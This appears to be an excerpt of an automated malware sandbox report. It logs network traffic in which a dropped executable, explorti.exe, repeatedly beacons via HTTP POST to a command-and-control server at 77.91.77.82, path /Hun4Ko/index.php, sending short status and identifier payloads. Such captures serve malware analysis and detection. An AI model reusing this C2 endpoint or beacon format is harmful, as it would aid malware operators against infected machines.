                  Jul 26, 2024 21:11:38.823297977 CEST4976380192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:38.823549032 CEST4976380192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:38.829258919 CEST804976377.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:54.966159105 CEST4976380192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:54.972814083 CEST4976480192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:54.977679968 CEST804976477.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:54.977741957 CEST4976480192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:54.978001118 CEST4976480192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:54.982758045 CEST804976477.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:58.981169939 CEST4976480192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:59.094219923 CEST4976580192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:59.099874020 CEST804976577.91.77.82192.168.2.4
                  Jul 26, 2024 21:11:59.100125074 CEST4976580192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:59.100178957 CEST4976580192.168.2.477.91.77.82
                  Jul 26, 2024 21:11:59.104979992 CEST804976577.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:03.106435061 CEST4976580192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.109632969 CEST4976680192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.114629030 CEST804976677.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:03.115536928 CEST4976680192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.115536928 CEST4976680192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.120506048 CEST804976677.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:03.579715967 CEST4976680192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.686942101 CEST4976780192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.692337036 CEST804976777.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:03.692403078 CEST4976780192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.692563057 CEST4976780192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:03.697937012 CEST804976777.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:06.137401104 CEST4976780192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.140233994 CEST4976880192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.145427942 CEST804976877.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:06.145504951 CEST4976880192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.145739079 CEST4976880192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.150614023 CEST804976877.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:06.153006077 CEST4976880192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.264764071 CEST4976980192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.270375013 CEST804976977.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:06.270528078 CEST4976980192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.270699024 CEST4976980192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:06.276751041 CEST804976977.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:27.662683964 CEST804976977.91.77.82192.168.2.4
                  Jul 26, 2024 21:12:27.664621115 CEST4976980192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:27.664621115 CEST4976980192.168.2.477.91.77.82
                  Jul 26, 2024 21:12:27.669791937 CEST804976977.91.77.82192.168.2.4

                  HTTP Request Dependency Graph

                  • 77.91.77.82

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.44973077.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:11.492743015 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.44973177.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:15.536706924 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44973677.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:19.658808947 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44973977.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:23.678807020 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44974077.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:27.802443027 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44974177.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:31.817023039 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44974277.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:35.943797112 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44974377.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:39.956861019 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44974477.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:44.068290949 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.44974577.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:48.083638906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.44974677.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:52.206054926 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.44974877.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:08:56.225498915 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.44974977.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:00.526297092 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.44975077.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:04.519944906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.44975177.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:08.909030914 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.44975277.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:12.927653074 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.44975377.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:17.122951984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.44975477.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:09:38.586484909 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.44975577.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:00.067935944 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.44975677.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:16.850768089 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.44975777.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:21.380522013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.44975877.91.77.82802172C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:22.475981951 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  22192.168.2.44975977.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:26.600574017 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination Port
                  23192.168.2.44976077.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:47.965507030 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  24192.168.2.44976177.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:10:55.899800062 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination Port
                  25192.168.2.44976277.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:11:17.295763016 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  26192.168.2.44976377.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:11:38.823549032 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination Port
                  27192.168.2.44976477.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:11:54.978001118 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session IDSource IPSource PortDestination IPDestination Port
                  28192.168.2.44976577.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:11:59.100178957 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination Port
                  29192.168.2.44976677.91.77.8280
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 21:12:03.115536928 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
